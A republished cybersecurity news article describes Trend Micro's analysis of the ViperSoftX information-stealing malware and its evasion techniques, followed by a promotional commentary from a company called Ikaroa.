A significant number of victims in the consumer and business sectors located in Australia, Japan, the US and India have been affected by an evasive information-stealing malware called ViperSoftX.
ViperSoftX was first documented in 2020, with cybersecurity firm Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension capable of siphoning cryptocurrency from wallet apps.
Now, a new analysis by Trend Micro has revealed the malware’s adoption of “more sophisticated encryption and basic anti-analysis techniques, such as byte remapping and web browser communication blocking.”
ViperSoftX’s arrival vector is usually a software crack or keygen (keygen), while employing genuine non-malicious software such as media editors and system cleaning applications as “carriers”.
One of the key steps malware takes before downloading a first-stage PowerShell loader is a series of anti-virtual machine, anti-monitoring, and anti-malware checks.
The loader then decrypts and executes a second-stage PowerShell script retrieved from a remote server, which is then responsible for launching the main routine responsible for installing fraudulent browser extensions to exfiltrate passwords and crypto wallet data .
The main command and control (C&C) servers used for the second stage download have been observed to change monthly, suggesting attempts by the actor to avoid detection.
Learn how to stop ransomware with real-time protection
Join our webinar and learn how to stop ransomware attacks with real-time MFA and service account protection.
Save my seat!
“It also uses some basic anti-C&C analysis by prohibiting communications with web browsers,” said Trend Micro researcher Don Ovid Ladores, adding the updated version of ViperSoftX scans to detect the presence of KeePass 2 and 1Password password managers.
As a mitigation, users are advised to download software only from official platforms and sources and avoid downloading illegal software.
“The cybercriminals behind ViperSoftX are also skilled enough to execute a seamless malware execution chain while staying under the radar of authorities by selecting one of the most effective methods of delivering malware to consumers,” he said. add Ovid Ladores.
Source link
Ikaroa, a full stack tech company, has recently taken note of a recent shift in the cyber security threats recently facing the world. It has recently been discovered that ViperSoftX has developed a new information stealing software that is capable of utilizing sophisticated techniques to remain largely undetected by traditional malware detectors and virus protection software.
ViperSoftX’s InfoStealer uses several strategies and tactics to continuously modify modules on infected systems, making it much more difficult to detect. It also uses multiple IP addresses from around the world which not only makes it harder to trace back the origin of the infiltration, but also renders it difficult to take down. By using sandbox evasion capabilities, it is able to detect virtual environments and will terminate its process if it detects one. It also relies on encrypted HTTP protocol, making it near impossible to detect malicious traffic.
Ikaroa is exceptionally concerned about such threats, and more effort should be put into developing more reliable cyber security solutions that are capable of blocking ransomware, browser hijackers, and other malicious programs, including the new-age information-stealing malware. Additionally, Ikaroa suggests training computer users on cyber security best practices, such as patching vulnerabilities to reduce the risk of infections and data theft.
Overall, ViperSoftX’s InfoStealer is making life harder for all cyber security firms, and poses a threat to computer users across the world. Ikaroa takes this threat very seriously and encourages its customers to stay up-to-date with the latest patches and security solutions, so as to reduce any risk of attack from dangerous software.
